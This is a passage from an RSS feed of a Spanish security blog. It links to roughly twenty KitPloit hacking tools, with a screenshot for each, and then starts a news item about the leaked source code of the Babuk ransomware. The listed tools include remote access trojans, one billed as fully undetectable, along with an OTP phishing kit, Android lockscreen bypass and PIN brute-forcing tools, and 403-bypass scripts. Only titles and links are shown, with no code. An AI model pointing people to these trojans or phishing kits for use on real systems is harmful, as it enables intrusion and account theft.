  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEiEZi9xf0kX4M34jg2I8IqDDdg2rlacfmhBwdUdGn8j8MEy74E-VDwCdpxZL3mI70YbvCS0B5EqVl1l9A8H4Uv3jW-1Z96wOAXyyJJS6INoGXkHdWnfddDJbbz9N7OF0L7mZgiYDz6-dMvCLEl-hZnEukJXcWyBheWTmSOUCdTt3kc7fJvF8aU-aKPMYw=s1406" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="1406" data-original-width="1168" height="400" src="https://blogger.googleusercontent.com/img/a/AVvXsEiEZi9xf0kX4M34jg2I8IqDDdg2rlacfmhBwdUdGn8j8MEy74E-VDwCdpxZL3mI70YbvCS0B5EqVl1l9A8H4Uv3jW-1Z96wOAXyyJJS6INoGXkHdWnfddDJbbz9N7OF0L7mZgiYDz6-dMvCLEl-hZnEukJXcWyBheWTmSOUCdTt3kc7fJvF8aU-aKPMYw=s400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/05/murmurhash-tool-to-calculate-murmurhash.html" target="_blank"&gt;MurMurHash - Tool To Calculate A MurmurHash Value Of A Favicon To Hunt Phishing Websites On The Shodan Platform&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMxWNlCfEvXJPahpZnGFIuSHBfKw3wG6hMhYNrPC0jzJhS9pBjcKSPq93Oj1Iwur6PepgJUrvlhqzx1qju_3jeCfKLn-wvWh4cdU3y1kPl1DWdzgyMyJYIXR7bI53gTFXLQyexaZg_68oMgEG8myG0RDq8l3yct4w-IWJmAMC4Uic1oS2C2kaNWsrTYA=s2048" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="1241" data-original-width="2048" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMxWNlCfEvXJPahpZnGFIuSHBfKw3wG6hMhYNrPC0jzJhS9pBjcKSPq93Oj1Iwur6PepgJUrvlhqzx1qju_3jeCfKLn-wvWh4cdU3y1kPl1DWdzgyMyJYIXR7bI53gTFXLQyexaZg_68oMgEG8myG0RDq8l3yct4w-IWJmAMC4Uic1oS2C2kaNWsrTYA=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/05/cilocks-android-lockscreen-bypass.html" target="_blank"&gt;CiLocks - Android LockScreen Bypass&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEjlKDePT7QrdidJi75I-s6fhYkKz2K8gmZ3e_TAZZ7eK2RjTOADY61UdtZklyx4NvWBroW0lM4HXv3_Z0o5EyLwicq-6gBgJBJBgCSlOJxAfFLR4_76BHrowxMK_lTVTglh1gbop9UDg8-CHQhO2OExMHCdSE641WCo7sQq4sOtvRwtIBYdTWu7CXxi1g=s650" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="513" data-original-width="650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjlKDePT7QrdidJi75I-s6fhYkKz2K8gmZ3e_TAZZ7eK2RjTOADY61UdtZklyx4NvWBroW0lM4HXv3_Z0o5EyLwicq-6gBgJBJBgCSlOJxAfFLR4_76BHrowxMK_lTVTglh1gbop9UDg8-CHQhO2OExMHCdSE641WCo7sQq4sOtvRwtIBYdTWu7CXxi1g=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/10/viper-intranet-pentesting-tool-with.html" target="_blank"&gt;Viper - Intranet Pentesting Tool With Webui&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEg6o36ba5VB74-26eLi9-w_QElh0ck1DOsdciojRPnB07GbjNqYL0UxjjSjPi4-r9w7Z1KggnzxtdKlVJI_KIYgnf_orN48nNA4S2QflQ49pd8c9hTszDOnPNWYCOWSnMWHU7F-qcjlNWAXxyaQs1LXng91YKaFx8rNi967dNEkzLXZ-aGz1KTc5LKLmA=s2048" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="1132" data-original-width="2048" src="https://blogger.googleusercontent.com/img/a/AVvXsEg6o36ba5VB74-26eLi9-w_QElh0ck1DOsdciojRPnB07GbjNqYL0UxjjSjPi4-r9w7Z1KggnzxtdKlVJI_KIYgnf_orN48nNA4S2QflQ49pd8c9hTszDOnPNWYCOWSnMWHU7F-qcjlNWAXxyaQs1LXng91YKaFx8rNi967dNEkzLXZ-aGz1KTc5LKLmA=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/12/forbidden-bypass-4xx-http-response.html" target="_blank"&gt;Forbidden - Bypass 4Xx HTTP Response Status Codes&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEijpTNoXpjab2V9MC7eWUhmbQnLV8tvcA7sea6mlguq3Ecwc32Emxf7RqklIRgFDC6aecEL_8LGn_baGCFfNm2WCJ1N6br8LrJYeZAxAe5qMyVm7hSJwCjf8TXpuBnimAviWjLjiVLidaoKQbv3_B5k8R6wrWRLG8K2DLlk0rbsviHdFOyLGntOrPeVJg=s640" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="376" data-original-width="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEijpTNoXpjab2V9MC7eWUhmbQnLV8tvcA7sea6mlguq3Ecwc32Emxf7RqklIRgFDC6aecEL_8LGn_baGCFfNm2WCJ1N6br8LrJYeZAxAe5qMyVm7hSJwCjf8TXpuBnimAviWjLjiVLidaoKQbv3_B5k8R6wrWRLG8K2DLlk0rbsviHdFOyLGntOrPeVJg=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/11/azurehunter-cloud-forensics-powershell.html" target="_blank"&gt;AzureHunter - A Cloud Forensics Powershell Module To Run Threat Hunting Playbooks On Data From Azure And O365&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEgBTOwTX5fmPrhfdfuQu0B7zqkafXmCCvSC0xU3kXIHgA6EfgA_nVtV2BbonIeLQWg2NDc59vwPGh3TMJg-6YXZTImWVAO03TIH3QV8sl9lrg7LZW0xsdPVQYmooYkQrCriRfHL7HkMNRm-7P2rSp6nwCV64ipmI0M6i0DKvrS-v7dn4mqe-rVjx4vUoA=s1109" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="616" data-original-width="1109" src="https://blogger.googleusercontent.com/img/a/AVvXsEgBTOwTX5fmPrhfdfuQu0B7zqkafXmCCvSC0xU3kXIHgA6EfgA_nVtV2BbonIeLQWg2NDc59vwPGh3TMJg-6YXZTImWVAO03TIH3QV8sl9lrg7LZW0xsdPVQYmooYkQrCriRfHL7HkMNRm-7P2rSp6nwCV64ipmI0M6i0DKvrS-v7dn4mqe-rVjx4vUoA=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/09/403bypasser-automates-techniques-used.html" target="_blank"&gt;403Bypasser - Automates The Techniques Used To Circumvent Access Control Restrictions On Target Pages&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEiT014in2ADKOj3XlHRWnUKwZcXT3z2IodVuFw1jzbRqTuRNTAsz9JLC052LvVq0M6PSPiBOiXJZzosye9gexPAYOCaJftoOGtWVCNa3P4FpcdfTFvO1uabiykWtgh6q2zd9wKi8v6ce9paXn5NikX63w795ok6DldneKifmc5SccRY06K_mKpcx3NVYA=s758" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="505" data-original-width="758" src="https://blogger.googleusercontent.com/img/a/AVvXsEiT014in2ADKOj3XlHRWnUKwZcXT3z2IodVuFw1jzbRqTuRNTAsz9JLC052LvVq0M6PSPiBOiXJZzosye9gexPAYOCaJftoOGtWVCNa3P4FpcdfTFvO1uabiykWtgh6q2zd9wKi8v6ce9paXn5NikX63w795ok6DldneKifmc5SccRY06K_mKpcx3NVYA=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/11/smuggler-http-request-smuggling-desync.html" target="_blank"&gt;Smuggler - An HTTP Request Smuggling / Desync Testing Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEg76SrvyXeeqAgubs3kCkNWUPtzUX1Xq4eQ2O_XyzOmETwKpGRM3gLIfcbLSZyqrGsihuVIkuAghoshNC4RixbrW3VI8hMTCrneL3taDeSmuGauT5f7giX_-G84mO1WKdMqkpVhQUIXEK-SGjJULfMHpwp5IaV2TMGuYcyG339OSmpr1Uh6RSejzr78gQ=s794" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="602" data-original-width="794" src="https://blogger.googleusercontent.com/img/a/AVvXsEg76SrvyXeeqAgubs3kCkNWUPtzUX1Xq4eQ2O_XyzOmETwKpGRM3gLIfcbLSZyqrGsihuVIkuAghoshNC4RixbrW3VI8hMTCrneL3taDeSmuGauT5f7giX_-G84mO1WKdMqkpVhQUIXEK-SGjJULfMHpwp5IaV2TMGuYcyG339OSmpr1Uh6RSejzr78gQ=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/05/nginxpwner-tool-to-look-for-common.html" target="_blank"&gt;Nginxpwner - Tool to look for common Nginx misconfigurations and vulnerabilities&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEh0sUkfqezX2iSn1c5vU74_CXhwSktSxgBPyeV1xs8B-m9z8rVSomlUbGe2QPqPTojhPV01Bsm-jjmIMUi70rYJcgPpgZsQIO-nle86_eGtJ7Aq54GvRdHBlxuQZ-bWmz7DYvAkeH8lEUc9jcUjYEBS2zu4PgpY8v8VV9XHAHLiWAPW_5HZmIPy2k5WKg=s1029" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="352" data-original-width="1029" src="https://blogger.googleusercontent.com/img/a/AVvXsEh0sUkfqezX2iSn1c5vU74_CXhwSktSxgBPyeV1xs8B-m9z8rVSomlUbGe2QPqPTojhPV01Bsm-jjmIMUi70rYJcgPpgZsQIO-nle86_eGtJ7Aq54GvRdHBlxuQZ-bWmz7DYvAkeH8lEUc9jcUjYEBS2zu4PgpY8v8VV9XHAHLiWAPW_5HZmIPy2k5WKg=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/09/sharpml-machine-learning-network-share.html" target="_blank"&gt;SharpML - Machine Learning Network Share Password Hunting Toolkit&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEgQcrrr-X2ISrQs6IhbPDoZqOjDXaip2s7cXUknflUkCwg9rjjeOEvP-DPGkOjDrQU-KKMffd_6RQtCd0wxjvz4N01nYtChv5GAvC0nAu54tbfEVgSQoabV5JDhhIUNqJaDE4nThyPdhVwdZVcEXARMMYTykAl8GY9dGEbhYmfJgMkGAhw0rcj5Uz3dOw=s1073" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="670" data-original-width="1073" src="https://blogger.googleusercontent.com/img/a/AVvXsEgQcrrr-X2ISrQs6IhbPDoZqOjDXaip2s7cXUknflUkCwg9rjjeOEvP-DPGkOjDrQU-KKMffd_6RQtCd0wxjvz4N01nYtChv5GAvC0nAu54tbfEVgSQoabV5JDhhIUNqJaDE4nThyPdhVwdZVcEXARMMYTykAl8GY9dGEbhYmfJgMkGAhw0rcj5Uz3dOw=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/10/petereport-open-source-application.html" target="_blank"&gt;PeTeReport - An Open-Source Application Vulnerability Reporting Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEjK067qpx9dllm2cqkw27KriApSPVvCiQMpSaKoAYYs-S_eIQYLEqYUVW_eIYISk6fT_TW0JwQBmfVxcoPHWSEnwwyzWrsDAPLutnUO9uoWxr3UHDCP7-kaRxID0cqswk20y7txyUUWKdY9lDUabppl_Y5LteEPY5Q6GZdD3b-RR6slEYj1sre_CDQoNQ=s2595" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="1212" data-original-width="2595" src="https://blogger.googleusercontent.com/img/a/AVvXsEjK067qpx9dllm2cqkw27KriApSPVvCiQMpSaKoAYYs-S_eIQYLEqYUVW_eIYISk6fT_TW0JwQBmfVxcoPHWSEnwwyzWrsDAPLutnUO9uoWxr3UHDCP7-kaRxID0cqswk20y7txyUUWKdY9lDUabppl_Y5LteEPY5Q6GZdD3b-RR6slEYj1sre_CDQoNQ=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/01/byp4xx-simple-bash-script-to-bypass-403.html" target="_blank"&gt;Byp4Xx - Simple Bash Script To Bypass "403 Forbidden" Messages With Well-Known Methods Discussed In #Bugbountytips&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEiE3XfCkho-GPgGYOmIj4gE-Vk4usZLM4jsQQROuJt81P3KQSNRB6swqjd45OKnHRfy0pqpfSNjp5PY5IeW_KwHxTZ13UwaFrJE7SY9gRD60efK5UAH1W7yL5QV71svFHe8VHMtaTUNoryA50bnZxkMFhu11t4l9nJH_0ai9l5Oj1JvX_HRmgRcfjxqrg=s760" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="380" data-original-width="760" src="https://blogger.googleusercontent.com/img/a/AVvXsEiE3XfCkho-GPgGYOmIj4gE-Vk4usZLM4jsQQROuJt81P3KQSNRB6swqjd45OKnHRfy0pqpfSNjp5PY5IeW_KwHxTZ13UwaFrJE7SY9gRD60efK5UAH1W7yL5QV71svFHe8VHMtaTUNoryA50bnZxkMFhu11t4l9nJH_0ai9l5Oj1JvX_HRmgRcfjxqrg=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/11/sillyrat-cross-platform-multifunctional.html" target="_blank"&gt;SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMTvtA6nqYpDWcSK9WbUQFQQp6IO296YB4Zfc0lMhUPNQX-TqT57E_SmhTLAIrVuBc1J_5HLYBI_QuAr7tSvumDzxIeyro_2TmjZRiA4o32vxE61rcXEuKEgZeMRTsob1eG6N9TaNSZJJItgLF4qsxTXBvpmJq4W1yfClZRXYsLLiPFsyE4omDKawXvA=s1882" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="926" data-original-width="1882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMTvtA6nqYpDWcSK9WbUQFQQp6IO296YB4Zfc0lMhUPNQX-TqT57E_SmhTLAIrVuBc1J_5HLYBI_QuAr7tSvumDzxIeyro_2TmjZRiA4o32vxE61rcXEuKEgZeMRTsob1eG6N9TaNSZJJItgLF4qsxTXBvpmJq4W1yfClZRXYsLLiPFsyE4omDKawXvA=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/10/qu1cksc0pe-all-in-one-static-malware.html" target="_blank"&gt;Qu1cksc0pe - All-in-One Static Malware Analysis Tool
&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXMcibvLr1hmsXVzSos-VN7chDu7q91DhpsQc9FUiiOej4oPiwO-SzoF3_3_FzHxlsCe2FAQszWAwkS3_vWxsW4JTkMWE1X5TOGlvER8TAa19VqhV7tsiT7Ju90lcTc8CdMnGM_700_v-N0BKt4ZCBAhEXqarH2kx4jyEAI7CwGhl_edCH9HHpqReJnQ=s1028" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="558" data-original-width="1028" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXMcibvLr1hmsXVzSos-VN7chDu7q91DhpsQc9FUiiOej4oPiwO-SzoF3_3_FzHxlsCe2FAQszWAwkS3_vWxsW4JTkMWE1X5TOGlvER8TAa19VqhV7tsiT7Ju90lcTc8CdMnGM_700_v-N0BKt4ZCBAhEXqarH2kx4jyEAI7CwGhl_edCH9HHpqReJnQ=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/04/android-pin-bruteforce-unlock-android.html" target="_blank"&gt;Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEhlr5C9puqCUbbPaTIHfKkXJlq2y5V4njJPE1uZzvurHL5kKxM4qboFErXpKmH0eG6ujEqE9ZHRlYRN3XYm_Tx1NIqz8M02cNMfF8agNE0PpmMrRERwtx819QyHAk7np_l889vS_r0KwLh4kmKt1bSwyFyTsSzpWiBerPptMIk6FykuIQPvlEPbN5UHSg=s989" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="684" data-original-width="989" src="https://blogger.googleusercontent.com/img/a/AVvXsEhlr5C9puqCUbbPaTIHfKkXJlq2y5V4njJPE1uZzvurHL5kKxM4qboFErXpKmH0eG6ujEqE9ZHRlYRN3XYm_Tx1NIqz8M02cNMfF8agNE0PpmMrRERwtx819QyHAk7np_l889vS_r0KwLh4kmKt1bSwyFyTsSzpWiBerPptMIk6FykuIQPvlEPbN5UHSg=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/01/arbitrium-rat-cross-platform-fully.html" target="_blank"&gt;Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linuxt&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEiq1NtF8-ot3rHLJ8HW9F2JG6PaX4ebre2ILzofKFnm0LGs1IOwps3YqAMqbjASv8ijc1AEMn8agVZGruBO-I6YWOIELNj2-nNSEcdUTTQzxP2Ja3k2JHylvg58KpG2xTOs135TrdBgavqUoC6xXgo-fXhBlWJaECfHn6s48e8-biAzd4Ygzi0_w-DSow=s1280" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/a/AVvXsEiq1NtF8-ot3rHLJ8HW9F2JG6PaX4ebre2ILzofKFnm0LGs1IOwps3YqAMqbjASv8ijc1AEMn8agVZGruBO-I6YWOIELNj2-nNSEcdUTTQzxP2Ja3k2JHylvg58KpG2xTOs135TrdBgavqUoC6xXgo-fXhBlWJaECfHn6s48e8-biAzd4Ygzi0_w-DSow=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2020/10/advphishing-this-is-advance-phishing.html" target="_blank"&gt;AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEguYy5w7e9IztLQOa5H8V53QWYsLEWQCr4SlPQ3OC6DWJOJm_RQiHOaWKa2ksPMtyYkC8V73F2e-vBQ7THi3RHi515Nzv_yD3Z9iE6hCaN6f9UzFYwV_VOfyuVkMVvBJNmWBtaq84FL0QAlNYfjjNLsaCdnCJnG5JYohiu1oSybX7ffqye-ek2b-cONYg=s641" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="564" data-original-width="641" src="https://blogger.googleusercontent.com/img/a/AVvXsEguYy5w7e9IztLQOa5H8V53QWYsLEWQCr4SlPQ3OC6DWJOJm_RQiHOaWKa2ksPMtyYkC8V73F2e-vBQ7THi3RHi515Nzv_yD3Z9iE6hCaN6f9UzFYwV_VOfyuVkMVvBJNmWBtaq84FL0QAlNYfjjNLsaCdnCJnG5JYohiu1oSybX7ffqye-ek2b-cONYg=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/01/mosint-osint-tool-for-emails.html" target="_blank"&gt;MOSINT - OSINT Tool For Emails&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEipACMFyuSokogC0vEde5AidqACfvEJocUj7rm9XrCrNUk5jXJ7KmOyuoGagLE3nIb7QIER3J4yxewPEq0M1uuwu8_R8FG-FwLe4wAcdnaMd3-XjSbSW4tWbKqiZXhHEkECYe1GlMF42E0MLyQFG_9VKXgdwJFabamWidabept2uAhyh-uBr-B66wLVWw=s2048" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="1483" data-original-width="2048" src="https://blogger.googleusercontent.com/img/a/AVvXsEipACMFyuSokogC0vEde5AidqACfvEJocUj7rm9XrCrNUk5jXJ7KmOyuoGagLE3nIb7QIER3J4yxewPEq0M1uuwu8_R8FG-FwLe4wAcdnaMd3-XjSbSW4tWbKqiZXhHEkECYe1GlMF42E0MLyQFG_9VKXgdwJFabamWidabept2uAhyh-uBr-B66wLVWw=s320" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;
&lt;/ol&gt;


&lt;br /&gt;
&lt;br /&gt;
[+] Saludos y feliz año nuevo!!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/a/AVvXsEgdSxlIZ7_0FgWqUmWTiq-Y6LR8EeZGdB19L3QyZH2VHimcUizvcMF_kB3J-tZVpObGPuRCNGxiJx94kAlOOvFrMRf50CBTMK9iSrDye4LiUsErNb_vDhklcQHzHhqFNHA4qS_Cf3amT-p0qIM65hLxSzY3fXPCPglfL3Jqh4rx9F0FBuPTTDbkA8-8CQ=s72-w640-h426-c" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>  El código fuente completo del Ransomware Babuk fue filtrado después de que uno de sus creadores fuera diagnosticado con cáncer terminal</title><link>http://www.blackploit.com/2021/09/el-codigo-fuente-completo-del.html</link><category>Noticias</category><category>Ransomware</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Tue, 7 Sep 2021 18:25:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-1375833651492441269</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFkN1njTwWRTPDeT9vrThyN9n_cOPc8YxM2snEf-F8YnGlKSQzaSQrj0tnp6e4HmR6Pq4W8s3Js5kEPdAGbcz4AU5YNU6KeGL0b-Mg8vej56O1OB9_mwKhvgFEXFa38lzkqEYGTX_nApu/s1392/babuk-post.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="451" data-original-width="1392" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFkN1njTwWRTPDeT9vrThyN9n_cOPc8YxM2snEf-F8YnGlKSQzaSQrj0tnp6e4HmR6Pq4W8s3Js5kEPdAGbcz4AU5YNU6KeGL0b-Mg8vej56O1OB9_mwKhvgFEXFa38lzkqEYGTX_nApu/w640-h208/babuk-post.jpeg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Los operadores de 